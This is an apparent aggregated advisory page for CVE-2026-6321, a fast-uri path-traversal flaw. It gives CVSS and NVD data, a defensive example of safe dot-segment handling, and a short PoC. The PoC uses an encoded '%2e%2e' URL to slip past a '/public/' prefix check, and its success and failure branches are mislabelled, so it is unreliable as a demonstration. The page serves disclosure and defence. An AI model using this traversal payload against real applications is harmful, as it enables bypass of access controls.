Security Vulnerability Report
CVE-2026-6321 CVSS 7.5 HIGH


Published: 2026-05-04 20:16:21
Last Modified: 2026-05-12 18:54:47
Source: ce714d77-add3-4f53-aff5-83d477b104bb

Description

fast-uri decoded percent-encoded path separators and dot segments before applying dot-segment removal in its normalize() and equal() functions. Encoded path data was treated like real slashes and parent-directory references, so distinct URIs could collapse onto the same normalized path. Applications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed, with a path that appears confined under an allowed prefix normalizing to a different location. Versions <= 3.1.0 are affected. Update to 3.1.1 or later.
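The ordering flaw described above (percent-decoding before dot-segment removal), modelled beside a prefix check that keeps encoded bytes opaque. This is an added example, not fast-uri's code; it assumes absolute http(s) URIs and a policy expressed as a path prefix such as /public/.

```javascript
// Added example (not fast-uri's code): safe path-prefix enforcement beside a
// model of the decode-first ordering that CVE-2026-6321 describes.

// RFC 3986 section 5.2.4 remove_dot_segments, segment by segment. Only a
// literal "." or ".." is a dot segment; "%2e%2e" is data and stays as-is.
function removeDotSegments(path) {
  const out = [];
  const segs = path.split('/');
  segs.forEach((seg, i) => {
    const last = i === segs.length - 1;
    if (seg === '.') {
      if (last) out.push('');            // "/a/." -> "/a/"
    } else if (seg === '..') {
      if (out.length > 1) out.pop();     // never pop the root marker ""
      if (last) out.push('');            // "/a/b/.." -> "/a/"
    } else {
      out.push(seg);
    }
  });
  return out.join('/');
}

// Model of the vulnerable ordering: decode first, then remove dot segments.
// Encoded ".." and "/" now act as real traversal, so distinct paths collapse.
function normalizeDecodeFirst(path) {
  return removeDotSegments(decodeURIComponent(path));
}

// Extract the path of an absolute URI with a plain regex (assumption: no URL
// parser, because WHATWG URL itself rewrites "%2e" segments, hiding the point).
function pathOf(uri) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/[^/?#]*([^?#]*)/i.exec(uri);
  if (!m) throw new Error('absolute URI expected');
  return m[1] === '' ? '/' : m[1];
}

// Hardened policy check: remove dot segments on the still-encoded path, then
// reject any segment that would turn into a separator or dot segment on decode.
function isConfined(uri, allowedPrefix) {
  const path = removeDotSegments(pathOf(uri));
  for (const seg of path.split('/')) {
    if (/%2f/i.test(seg)) return false;  // encoded "/" hidden inside one segment
    let decoded;
    try { decoded = decodeURIComponent(seg); } catch (e) { return false; }  // malformed escape
    if (decoded === '.' || decoded === '..') return false;
  }
  return path.startsWith(allowedPrefix);
}
```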

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openjsf:fast-uri:*:*:*:*:*:node.js:*:* - VULNERABLE
fast-uri <= 3.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// PoC demonstration of CVE-2026-6321
// Vulnerable library: fast-uri <= 3.1.0
const fastUri = require('fast-uri');

// Scenario: Application restricts access to '/public' directory
const allowedBase = 'https://example.com/public/';

// Attacker crafts a malicious URL using percent-encoded parent directory references
// '%2e%2e' decodes to '..'
const attackerInput = 'https://example.com/public/%2e%2e/admin/config';
console.log('Original Input: ' + attackerInput);

// The application normalizes the URI to enforce the policy
const normalizedPath = fastUri.normalize(attackerInput);
console.log('Normalized Path: ' + normalizedPath);

// Vulnerability Check:
// The application checks if the normalized path starts with the allowed base.
// Due to the bug, the normalized path resolves outside the allowed base.
if (normalizedPath.startsWith(allowedBase)) {
  console.log('Access Granted: Path is within allowed directory.');
} else {
  console.log('Access Bypassed: Path is outside allowed directory!');
  console.log('Intent: Access /admin/config via /public/%2e%2e/..');
}
```

References

https://cna.openjsf.org/security-advisories.html (Vendor Advisory)
https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-6321",
    "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb",
    "published": "2026-05-04T20:16:20.950",
    "lastModified": "2026-05-12T18:54:46.870",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "fast-uri decoded percent-encoded path separators and dot segments before applying dot-segment removal in its normalize() and equal() functions. Encoded path data was treated like real slashes and parent-directory references, so distinct URIs could collapse onto the same normalized path. Applications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed, with a path that appears confined under an allowed prefix normalizing to a different location. Versions <= 3.1.0 are affected. Update to 3.1.1 or later."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "ce714d77-add3-4f53-aff5-83d477b104bb",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openjsf:fast-uri:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "3.1.1",
                "matchCriteriaId": "7F2ECF8E-70DB-4CD4-95E1-7DC2A622A8B8"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://cna.openjsf.org/security-advisories.html",
        "source": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6",
        "source": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```